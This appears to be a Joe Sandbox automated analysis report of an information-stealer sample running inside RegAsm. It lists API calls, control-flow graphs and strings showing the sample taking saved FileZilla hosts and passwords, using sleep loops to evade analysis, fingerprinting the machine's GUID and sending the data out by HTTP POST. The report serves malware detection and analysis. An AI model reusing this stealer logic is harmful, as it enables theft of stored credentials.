                                                                                                                                                                                                                                                              control_flow_graph 406 40b3f4-40b4b3 _EH_prolog call 40e2ea call 40f7a3 call 40e3ef call 40e3a8 call 40e355 * 2 call 40e463 call 40e3a8 call 40e355 call 40e321 call 406138 429 40b8d0-40b8f4 call 40e355 call 4010d8 406->429 430 40b4b9-40b4c8 call 40f7ef 406->430 430->429 436 40b4ce-40b53b strtok_s call 40e2ea * 4 GetProcessHeap HeapAlloc 430->436 446 40b81a-40b81c 436->446 447 40b540-40b54e StrStrA 446->447 448 40b822-40b8cb lstrlen call 40e2ea call 401128 call 412f70 call 40e355 memset call 40e4db * 4 call 40e355 * 4 446->448 449 40b550-40b57e lstrlen call 40fbd6 call 40e3a8 call 40e355 447->449 450 40b583-40b591 StrStrA 447->450 448->429 449->450 453 40b593-40b5c7 lstrlen call 40fbd6 call 40e3a8 call 40e355 450->453 454 40b5cc-40b5da StrStrA 450->454 453->454 456 40b615-40b623 StrStrA 454->456 457 40b5dc-40b610 lstrlen call 40fbd6 call 40e3a8 call 40e355 454->457 463 40b629-40b677 lstrlen call 40fbd6 call 40e3a8 call 40e355 call 40e521 call 4061ef 456->463 464 40b6ae-40b6c2 call 40e521 lstrlen 456->464 457->456 463->464 507 40b679-40b6a9 call 40e35e call 40e463 call 40e3a8 call 40e355 463->507 482 40b807-40b818 strtok_s 464->482 483 40b6c8-40b6d9 call 40e521 lstrlen 464->483 482->446 483->482 492 40b6df-40b6f0 call 40e521 lstrlen 483->492 492->482 502 40b6f6-40b707 call 40e521 lstrlen 492->502 502->482 511 40b70d-40b802 lstrcat * 2 call 40e521 lstrcat * 2 call 40e521 lstrcat * 3 call 40e521 lstrcat * 3 call 40e521 lstrcat * 3 call 40e35e * 4 502->511 507->464 511->482
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040B3F9
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: _EH_prolog.MSVCRT ref: 0040613D
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406160
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406177
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406193
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004061AD
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                • Part of subcall function 0040F7EF: LocalAlloc.KERNEL32(00000040,00411C18,00000001,00000000,?,00411C17,00000000,00000000), ref: 0040F808
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040B4D7
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F,00423C57,00423C56,00423C53,00423C52), ref: 0040B52B
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040B532
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040B546
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B551
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040B589
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B594
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<User>), ref: 0040B5D2
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040B61B
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B62A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040B825
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040B878
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
                                                                                                                                                                                                                                                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                              • API String ID: 486015307-935134978
                                                                                                                                                                                                                                                              • Opcode ID: d734cb7e98ce5ff3dcd9777db4795c10a327c34f21a19f67334f3ad32ab2936a
                                                                                                                                                                                                                                                              • Instruction ID: b166f65aba0722b069cc7c7f7918c4dbbdc0f5e6aabe4ab2eb970daa8bbeb78c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d734cb7e98ce5ff3dcd9777db4795c10a327c34f21a19f67334f3ad32ab2936a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67E15271D00118AADB05FBE2DD46AEEBB78AF14304F54486EF401B21D2EB385B14CB69
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00415AE6
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415B1B
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415B22
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415B29
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415B30
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415B37
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415B3E
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415B4A
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415B51
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415B58
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415B5F
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415B6F
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415B76
                                                                                                                                                                                                                                                              • GetSystemTime.KERNEL32(?), ref: 00415B80
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415B87
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415B8E
                                                                                                                                                                                                                                                              • srand.MSVCRT ref: 00415B99
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415BA0
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415BA7
                                                                                                                                                                                                                                                              • rand.MSVCRT ref: 00415BAD
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415BB3
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415BBA
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415BC6
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415BCD
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415BD4
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415BDB
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415BE2
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415BE9
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415BF0
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000014), ref: 00415BF7
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00415C78
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00001B58), ref: 00415C83
                                                                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00424A48,?,00000000,004244C3), ref: 00415C94
                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415CAA
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00415CB8
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00415CBF
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Sleep$CloseEventHandle$CreateExitLibraryLoadOpenProcessSystemTimerandsrand
                                                                                                                                                                                                                                                              • String ID: GetSystemTime$Sleep$kernel32.dll
                                                                                                                                                                                                                                                              • API String ID: 1899683397-3444385320
                                                                                                                                                                                                                                                              • Opcode ID: a20a1ddb1d470827b54f13a8b3a00c6c80afe7113cc5e40a79b8becaa9aec2c7
                                                                                                                                                                                                                                                              • Instruction ID: 9fbc28225f14d69cee995eff129ba092aaa0e00c5b52ebe00b2e5197042d8efa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a20a1ddb1d470827b54f13a8b3a00c6c80afe7113cc5e40a79b8becaa9aec2c7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D841AD36501924AFCB017BB1ED4DDDEBF6BAE89715700242EF502B50A1DF3856428FEA
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 588 405114-4051e3 _EH_prolog call 40e321 call 403a07 call 40e2ea * 5 call 40e521 InternetOpenA StrCmpCA 605 4051e5 588->605 606 4051e7-4051ea 588->606 605->606 607 4051f0-40536e call 40f5de call 40e3ef call 40e3a8 call 40e355 * 2 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3ef call 40e3a8 call 40e355 * 2 InternetConnectA 606->607 608 4058b5-4058db InternetCloseHandle call 40e521 call 4061ef 606->608 607->608 688 405374-4053a5 HttpOpenRequestA 607->688 618 4058dd-40590a call 40e35e call 40e463 call 40e3a8 call 40e355 608->618 619 40590f-40597c call 40f516 * 2 call 40e355 * 4 call 4010d8 call 40e355 608->619 618->619 689 4053ab-4053ad 688->689 690 4058ac-4058af InternetCloseHandle 688->690 691 4053c5-405852 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 4020a3 call 40e3ef call 40e3a8 call 40e355 * 2 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e521 lstrlen call 40e521 lstrlen GetProcessHeap HeapAlloc call 40e521 lstrlen call 40e521 memcpy call 40e521 lstrlen call 40e521 * 2 lstrlen memcpy call 40e521 lstrlen call 40e521 HttpSendRequestA 689->691 692 4053af-4053bf InternetSetOptionA 689->692 690->608 853 40588e-4058a3 InternetReadFile 691->853 692->691 854 405854-405859 853->854 855 4058a5-4058a6 InternetCloseHandle 853->855 854->855 856 40585b-405889 call 40e463 call 40e3a8 call 40e355 854->856 855->690 856->853
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00405119
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: _EH_prolog.MSVCRT ref: 00403A0C
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A3E
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A47
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A50
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403A6A
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403A7A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051C4
                                                                                                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405363
                                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 0040539A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00423AF8,00000000), ref: 004057A9
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 004057BA
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004057C4
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004057CB
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 004057DC
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 004057ED
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 004057FE
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405817
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00405820
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405833
                                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(?,00000000,00000000), ref: 00405847
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,000000C7,?), ref: 0040589B
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 004058A6
                                                                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004053BF
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 004058AF
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 004058B8
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 004051DB
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                                                                              • String ID: "$"$"$)$------$------$------$------$build_id$mode
                                                                                                                                                                                                                                                              • API String ID: 2237346945-290892794
                                                                                                                                                                                                                                                              • Opcode ID: c479e2d29b98b47438dbfd3a817438454e91a71a3f64224b7e2e4310f61ac810
                                                                                                                                                                                                                                                              • Instruction ID: 00d0b6fd9aec665fcf80781b4ea6017fc21f92f67d473f1e1768996e30c26457
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c479e2d29b98b47438dbfd3a817438454e91a71a3f64224b7e2e4310f61ac810
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB42347280014CEADB05EBE2D956AEEBBBCAF14308F14446EF501732C2DB781B59DB65
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 862 41313d-413f7f _EH_prolog call 40e2ea call 40e463 call 40e3a8 call 40e355 call 402089 call 40e3ef call 40e3a8 call 40e355 * 2 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e6be call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40eef9 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40ef86 call 40e3ef call 40e3a8 call 40e355 * 2 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40efc1 call 40e3ef call 40e3a8 call 40e355 * 2 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 GetCurrentProcessId call 40fa83 call 40e3ef call 40e3a8 call 40e355 * 2 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40f12f call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40f242 call 40e3ef call 40e3a8 call 40e355 * 2 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40f3cb call 40e3ef call 40e3a8 call 40e355 * 2 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e683 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e651 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40ee84 call 40e3ef call 40e3a8 call 40e355 * 2 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e76b call 40e3ef call 40e3a8 call 40e355 * 2 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e6be call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e718 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e89e call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e93a call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e907 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40ea07 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40ea70 call 40e3ef call 40e3a8 call 40e355 * 2 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40eda7 call 40e3ef call 40e3a8 call 40e355 * 2 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40eb55 call 40e3ef call 40e3a8 call 40e355 * 2 call 40eb55 call 40e3ef call 40e3a8 call 40e355 * 2 call 40e463 call 40e3a8 call 40e355 call 40e521 lstrlen call 40e521 call 40e2ea call 401128 call 412f70 call 40e355 * 2 call 4010d8
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00413142
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E6BE: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042444E), ref: 0040E6CC
                                                                                                                                                                                                                                                                • Part of subcall function 0040E6BE: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042444E), ref: 0040E6D3
                                                                                                                                                                                                                                                                • Part of subcall function 0040E6BE: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042444E), ref: 0040E6DF
                                                                                                                                                                                                                                                                • Part of subcall function 0040E6BE: wsprintfA.USER32 ref: 0040E70A
                                                                                                                                                                                                                                                                • Part of subcall function 0040EEF9: memset.MSVCRT ref: 0040EF1F
                                                                                                                                                                                                                                                                • Part of subcall function 0040EEF9: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,NDB,?,?,00000000), ref: 0040EF3B
                                                                                                                                                                                                                                                                • Part of subcall function 0040EEF9: RegQueryValueExA.KERNEL32(NDB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0040EF5A
